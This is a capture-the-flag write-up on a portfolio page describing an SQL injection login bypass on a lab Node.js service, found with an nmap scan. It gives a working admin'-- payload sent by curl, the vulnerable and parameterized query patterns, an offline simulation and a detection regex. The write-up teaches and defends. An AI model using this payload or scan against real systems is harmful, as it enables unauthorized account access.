๐Ÿ Home ๐Ÿ‘คAbout ๐ŸŽ“Education ๐Ÿ’ปProjects โš™๏ธExperience โœ‰๏ธContact ๐Ÿ“Blog
โ† Back to Portfolio
SQL Injection Auth Bypass HackerDNA Lab

Auth Bypass via SQL Injection

// Challenge Summary

A classic SQL injection authentication bypass on an enterprise login portal running Node.js/Express on a non-standard port discovered via Nmap scanning.

Target: 63.32.98.247
Service Port: 8080 (Node.js)
Vulnerability: SQL Injection
Tools Used: nmap, curl, gobuster

Methodology

1. Port Discovery: The main page on port 80 was just a static challenge page. Ran a full port scan to find the real service.

2. Service Enumeration: Discovered port 8080 running Node.js/Express, the actual authentication system.

3. Login Form Analysis: Port 8080 revealed an enterprise login form POSTing to the /login endpoint.

4. SQL Injection: Tested the username field with classic payloads; authentication was bypassed successfully.

Reconnaissance

The challenge page only showed a static landing page on port 80 with no useful attack surface. The hint said to "find the authentication service located on this network", which meant port scanning was required.

nmap scan (bash):
nmap -sV -p- --min-rate 5000 63.32.98.247

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.26.3
8080/tcp open  http    Node.js (Express middleware)

Port 8080 was the target: a Node.js/Express application running the authentication service.

Enumeration

Visiting http://63.32.98.247:8080/ revealed a standard enterprise login form with username and password fields, submitting credentials via POST to /login.

First I tested default credentials:

default creds test (bash):
curl -X POST http://63.32.98.247:8080/login \
  -d "username=admin&password=admin"

✗ Authentication failed. Invalid username or password.

Default credentials did not work. Moving on to SQL injection testing.

Exploitation

The login form was a prime candidate for SQL injection. The classic payload to bypass authentication is:

injection payload logic (sql):
-- Normal query the app runs:
SELECT * FROM users WHERE username='INPUT' AND password='INPUT'

-- With payload  admin'--  the query becomes:
SELECT * FROM users WHERE username='admin'--' AND password='...'

-- Everything after -- is a comment, so the password check is ignored!

exploit (bash):
curl -X POST http://63.32.98.247:8080/login \
  -d "username=admin'--&password=anything"

✓ Authentication Successful! Welcome, admin!

Vulnerability Analysis

⚠ OWASP A03:2021: SQL Injection

The application directly concatenated user-supplied input into SQL queries without sanitization or parameterization. This is one of the most well-known and dangerous vulnerabilities in web security.

Vulnerable Code Pattern

vulnerable code (javascript, example):
// ❌ VULNERABLE: string concatenation puts user input into the SQL text
const query = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;

Secure Code Pattern

secure code (javascript):
// ✅ SECURE: parameterized query, values are bound separately from the SQL text
const query = 'SELECT * FROM users WHERE username=? AND password=?';
db.execute(query, [username, password]);
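As an added example (not the lab's code or the writeup's own snippets), the following Node.js script models what a database engine does with the two patterns above and with the payload logic from the Exploitation section. USERS is a constructed sample table, effectiveQuery is a deliberately minimal stand-in for the engine's lexer (single-quoted strings and `--` line comments only), and all function names are my own; the script runs offline with no database.

```javascript
// Added example (not the lab's or the writeup's own code). It models how a SQL
// engine sees the two query-building styles from the writeup, using a tiny
// in-memory "database" that understands only the one SELECT shape discussed.
// USERS is a constructed sample table; the credentials are made up.
const USERS = [
  { username: 'admin', password: 'S3cret!' },
  { username: 'alice', password: 'hunter2' },
];

// Vulnerable pattern: user input is spliced into the SQL text itself.
function buildConcatenatedQuery(username, password) {
  return `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;
}

// Mimics the lexer stage: honours single-quoted strings ('' is an escaped
// quote inside them) and discards everything after a "--" that appears
// outside a string, which is how a real engine treats a line comment.
function effectiveQuery(sql) {
  let out = '';
  let inString = false;
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (inString) {
      out += ch;
      if (ch === "'") {
        if (sql[i + 1] === "'") { out += "'"; i++; } // escaped '' stays in the string
        else inString = false;
      }
    } else if (ch === '-' && sql[i + 1] === '-') {
      break; // comment start: the rest of the statement is dropped
    } else {
      out += ch;
      if (ch === "'") inString = true;
    }
  }
  if (inString) throw new Error('syntax error: unterminated string literal');
  return out.trim();
}

// "Executes" the effective text against USERS. A missing password clause
// (which is exactly what the comment payload produces) means no password check.
const SHAPE = /^SELECT \* FROM users WHERE username='((?:[^']|'')*)'(?: AND password='((?:[^']|'')*)')?$/;
function runConcatenated(sql) {
  const text = effectiveQuery(sql);
  const m = SHAPE.exec(text);
  if (!m) throw new Error('unsupported statement: ' + text);
  const unquote = (s) => s.replace(/''/g, "'");
  const wantUser = unquote(m[1]);
  const wantPass = m[2] === undefined ? null : unquote(m[2]);
  return USERS.filter((u) => u.username === wantUser && (wantPass === null || u.password === wantPass));
}

// Secure pattern: the SQL text is a constant with placeholders; the values are
// bound separately and never pass through the lexer, so a quote or "--" in
// them is just data that has to match a column value literally.
function runParameterized(username, password) {
  const sql = 'SELECT * FROM users WHERE username=? AND password=?';
  const params = [username, password];
  if ((sql.match(/\?/g) || []).length !== params.length) {
    throw new Error('placeholder/parameter count mismatch');
  }
  return USERS.filter((u) => u.username === params[0] && u.password === params[1]);
}

// Defensive check for the login log: flags a username carrying a quote
// followed by a SQL comment marker, without tripping on legitimate apostrophes.
function looksLikeCommentInjection(username) {
  return /'\s*(--|#|\/\*)/.test(username);
}

console.log(runConcatenated(buildConcatenatedQuery("admin'--", 'anything')).map((u) => u.username)); // [ 'admin' ]
console.log(runParameterized("admin'--", 'anything').length); // 0
```

The concatenated path returns the admin row for the `admin'--` payload because the password clause never reaches the engine; the parameterized path returns nothing because no user is literally named `admin'--`. A username such as `admin'` (unbalanced quote) makes the concatenated path throw a syntax error, which is the kind of server-side error that shows up in application logs when this class of bug is being probed.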

Key Learnings

🔍 Port Scanning First: Always scan all ports; services often run on non-standard ports like 8080, 8443, 3000.

💉 Test Input Fields: Every login form should be tested for SQL injection before trying other techniques.

🛡️ Use Parameterized Queries: Prepared statements prevent SQL injection through the bound values no matter what the input contains.

🧠 Understand the SQL Logic: Understanding how the query breaks helps craft better payloads and explain fixes.

🔗 Lab Link: http://63.32.98.247/ (HackerDNA Auth Bypass Challenge)